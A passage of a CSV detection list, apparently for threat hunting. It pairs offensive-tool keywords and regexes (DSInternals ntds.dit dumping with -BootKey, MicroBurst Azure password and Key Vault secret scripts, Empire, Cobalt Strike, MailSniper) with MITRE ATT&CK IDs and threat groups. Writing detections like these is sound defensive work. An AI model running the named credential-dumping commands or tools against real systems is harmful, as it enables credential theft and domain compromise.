T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/BokuLoader","1","1","N/A","10","10","1186","235","2023-11-22T22:25:50Z","2021-08-15T18:17:28Z" "*Get_WinPwn_Repo.sh*",".{0,1000}Get_WinPwn_Repo\.sh.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*Get-AccessTokenWithPRT*",".{0,1000}Get\-AccessTokenWithPRT.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Get-AccountPassDontExpire*",".{0,1000}Get\-AccountPassDontExpire.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*Get-AclModificationRights*",".{0,1000}Get\-AclModificationRights.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Get-ActiveTCPConnections*",".{0,1000}Get\-ActiveTCPConnections.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Start-MonitorTCPConnections.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-ADComputer * -Properties PrincipalsAllowedToDelegateToAccount*",".{0,1000}Get\-ADComputer\s.{0,1000}\s\-Properties\sPrincipalsAllowedToDelegateToAccount.{0,1000}","offensive_tool_keyword","powershell","Command to get the list of accounts with PrincipalsAllowedToDelegateToAccount (used to exploit Bronze Bit Attack)","T1003 - T1057 - T1087 - T1482 - T1136","TA0001 - TA0002 - TA0005 - TA0006 - TA0008","N/A","N/A","Reconnaissance","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-ADCSVulns*",".{0,1000}Get\-ADCSVulns.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*Get-ADDBAccount * -DataBasePath *ntds.dit*",".{0,1000}Get\-ADDBAccount\s.{0,1000}\s\-DataBasePath\s.{0,1000}ntds\.dit.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","AD Enumeration","10","10","1530","244","2024-04-13T19:52:07Z","2015-12-25T13:23:05Z" "*Get-ADDBAccount * -DBPath *ntds.dit*",".{0,1000}Get\-ADDBAccount\s.{0,1000}\s\-DBPath\s.{0,1000}ntds\.dit.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","AD Enumeration","10","10","1530","244","2024-04-13T19:52:07Z","2015-12-25T13:23:05Z" "*Get-ADDBAccount -All -DBPath *.ntds.dit* -BootKey*",".{0,1000}Get\-ADDBAccount\s\-All\s\-DBPath\s.{0,1000}\.ntds\.dit.{0,1000}\s\-BootKey.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","AD Enumeration","10","10","1530","244","2024-04-13T19:52:07Z","2015-12-25T13:23:05Z" "*Get-ADDBAccount* -BootKey* -DataBasePath *.ntds.dit",".{0,1000}Get\-ADDBAccount.{0,1000}\s\-BootKey.{0,1000}\s\-DataBasePath\s.{0,1000}\.ntds\.dit","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","AD Enumeration","10","10","1530","244","2024-04-13T19:52:07Z","2015-12-25T13:23:05Z" "*Get-ADDBAccount* -BootKey* -DBPath *.ntds.dit",".{0,1000}Get\-ADDBAccount.{0,1000}\s\-BootKey.{0,1000}\s\-DBPath\s.{0,1000}\.ntds\.dit","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","AD Enumeration","10","10","1530","244","2024-04-13T19:52:07Z","2015-12-25T13:23:05Z" "*Get-ADDBAccount* -DataBasePath *.ntds.dit* -BootKey*",".{0,1000}Get\-ADDBAccount.{0,1000}\s\-DataBasePath\s.{0,1000}\.ntds\.dit.{0,1000}\s\-BootKey.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","AD Enumeration","10","10","1530","244","2024-04-13T19:52:07Z","2015-12-25T13:23:05Z" "*Get-ADReplAccount -All *",".{0,1000}Get\-ADReplAccount\s\-All\s.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","N/A","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","AD Enumeration","10","10","1530","244","2024-04-13T19:52:07Z","2015-12-25T13:23:05Z" "*Get-ADUsernameFromEWS*",".{0,1000}Get\-ADUsernameFromEWS.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*GetADUsers.py*",".{0,1000}GetADUsers\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*Get-ADUsersWithoutPreAuth*",".{0,1000}Get\-ADUsersWithoutPreAuth.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*getAggressorClient*",".{0,1000}getAggressorClient.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*getAllUserSpns*",".{0,1000}getAllUserSpns.{0,1000}","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","N/A","Discovery","https://github.com/dirkjanm/ldapdomaindump","1","1","N/A","10","10","1068","180","2024-02-13T12:41:07Z","2016-05-24T18:46:56Z" "*Get-ASREPHash*",".{0,1000}Get\-ASREPHash.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","AS-REP roasting Get the hash for a roastable user using ASREPRoast.ps1","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Get-AzAutomationAccountCredsREST.ps1*",".{0,1000}Get\-AzAutomationAccountCredsREST\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*Get-AzDomainInfo*",".{0,1000}Get\-AzDomainInfo.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*Get-AzDomainInfoREST.ps1*",".{0,1000}Get\-AzDomainInfoREST\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*Get-AzKeyVaultKeysREST.ps1*",".{0,1000}Get\-AzKeyVaultKeysREST\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*Get-AzKeyVaultSecretsREST.ps1*",".{0,1000}Get\-AzKeyVaultSecretsREST\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*Get-AzPasswords*",".{0,1000}Get\-AzPasswords.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*Get-AZStorageKeysREST.ps1*",".{0,1000}Get\-AZStorageKeysREST\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*Get-AzureADDomainInfo*",".{0,1000}Get\-AzureADDomainInfo.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*Get-AzureADDomainInfo.ps1*",".{0,1000}Get\-AzureADDomainInfo\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*Get-AzureADUsers *",".{0,1000}Get\-AzureADUsers\s.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","Gets user directory","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*Get-AzurePasswords*",".{0,1000}Get\-AzurePasswords.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*Get-AzUserAssignedIdentity*",".{0,1000}Get\-AzUserAssignedIdentity.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*Get-BaseLineResponseTimeEAS*",".{0,1000}Get\-BaseLineResponseTimeEAS.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1114 - T1134.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","10","2810","550","2022-10-20T08:13:33Z","2016-09-08T00:36:51Z" "*Get-BeaconAPI*",".{0,1000}Get\-BeaconAPI.{0,1000}","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","10","10","244","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" "*GetBearerToken.exe https://*.sharepoint.com*",".{0,1000}GetBearerToken\.exe\shttps\:\/\/.{0,1000}\.sharepoint\.com.{0,1000}","offensive_tool_keyword","SnaffPoint","A tool for pointesters to find candies in SharePoint","T1210.001 - T1087.002 - T1059.006","TA0007 - TA0002 - TA0006","N/A","N/A","Discovery","https://github.com/nheiniger/SnaffPoint","1","0","N/A","7","3","210","20","2022-11-04T13:26:24Z","2022-08-25T13:16:06Z" "*Get-BloodHoundData*",".{0,1000}Get\-BloodHoundData.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SPN.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-BootKey*",".{0,1000}Get\-BootKey.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-BrowserData.ps1*",".{0,1000}Get\-BrowserData\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1153","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-BrowserInformation*",".{0,1000}Get\-BrowserInformation.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*GetC2Server*",".{0,1000}GetC2Server.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*Get-CachedGPPPassword*",".{0,1000}Get\-CachedGPPPassword.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-CachedRDPConnection*",".{0,1000}Get\-CachedRDPConnection.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - 